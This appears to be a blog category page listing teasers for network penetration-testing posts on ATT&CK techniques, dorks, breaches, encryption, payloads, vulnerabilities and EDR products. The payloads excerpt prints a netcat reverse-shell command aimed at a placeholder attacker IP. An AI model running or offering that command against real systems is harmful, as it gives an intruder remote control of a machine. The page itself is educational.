Category: Uncategorized

  • 17 att&ck Threats: Network Pentest Approach

    One effective framework for comprehending and addressing these threats is the MITRE ATT&CK matrix. In this discussion, we’ll explore 17 techniques from the matrix and delve into how a network pentest can be instrumental in preventing and mitigating such threats. Personally, I think the best examples of the att&ck framework can be found on hybrid-analysis.com.…

  • 17 Top Tech Companies in New England

    This is a short list of 17 top tech companies in New England. Several of these began as start-ups, and many of them were big-tech companies before the rise of tech as an industry in New England. Not all of them are located in Massachusetts, but a good amount are. If you’re looking to learn…

  • 17 Dorks & Network Pentesting Reconaissance

    Network penetration testing, an essential facet of cybersecurity, involves a meticulous process to identify and mitigate vulnerabilities within a network, and this is my post on network pentesting reconaissance with common Google dorks. Do note that this is only common Google dorks, the best ones, I actually use to help me secure my business growth!.…

  • 17 Breaches – Internal Network Pentest Could Have Prevented

    Date Company How Breached Company URL News Article 2013-12-19 Target Malware on Point-of-Sale systems Target Target Data Breach – CNBC 2014-09-02 Home Depot Malware in point-of-sale systems Home Depot Home Depot Confirms Breach – KrebsOnSecurity 2017-09-07 Equifax Exploited a vulnerability in website software Equifax Equifax Data Breach – The Guardian 2013-12-21 Adobe Cyber-attack, exposed user…

  • 17 Encryption Algorithms In Network Pentests

    This is a comprehensive list of the 17 top encryption algorithms found in network pentests. No. Encryption Algorithm URL Description 1 AES (Advanced Encryption Standard) NIST – AES AES is a symmetric encryption algorithm widely used for securing sensitive data. Its strength lies in its efficiency and security, making it a standard choice for various…

  • 17 Most Common OS’s – Network Pentesting

    Before you read the table below, I want to first say nixOS is one of my favorite OS’s used for network pentesting, followed by Kali. Neither are found on the table below, because this is a list of common OS’s found in organizations/in the wild. No. Operating System URL Description 1 Windows 10 Microsoft Windows…

  • 17 Potent Network Pentest Payloads

    This post lists the 17 payloads found commonly in the wild. I also wrote a post on 17 of the most common vulnerabilities – here. Payload Description Usage Example URL Reverse Shell Establishes a connection from the target to the attacker, allowing remote control of the system. nc -e /bin/sh attacker_ip 1234 Reverse Shell Payload…

  • Key Vulnerabilities in Cyber:Network Pentest

    Cyber Attack Abbreviation Description OWASP URL Cross-Site Scripting XSS Injecting malicious scripts into web pages viewed by users. Exploits vulnerabilities in web apps. OWASP XSS SQL Injection SQLi Targeting databases by inserting malicious SQL code into input fields. Can lead to data breaches. OWASP SQL Injection Cross-Site Request Forgery CSRF Tricking a user’s browser into…

  • Top Endpoint Detection and Response

    17 top Endpoint Detection and Response (EDR) software solutions: EDR Software Description URL CrowdStrike Falcon CrowdStrike Falcon is a cloud-native EDR platform known for its real-time threat intelligence and endpoint protection capabilities, offering next-gen antivirus, endpoint detection, and response features. CrowdStrike Falcon Carbon Black (VMware Carbon Black Cloud) Now part of VMware, Carbon Black Cloud…

  • “Penetration Testing” Colleges: A Nice List

    College Name Description URL Bentley University Offers a cybersecurity risk management certificate with diverse certification options, costing $9,900, emphasizing practical skills and inclusive career services. Bentley University Cybersecurity Bowie State University Provides graduate and bachelor’s degrees in computer science with a cybersecurity focus, recognized as a National Center of Academic Excellence. Bowie State Cybersecurity Butler…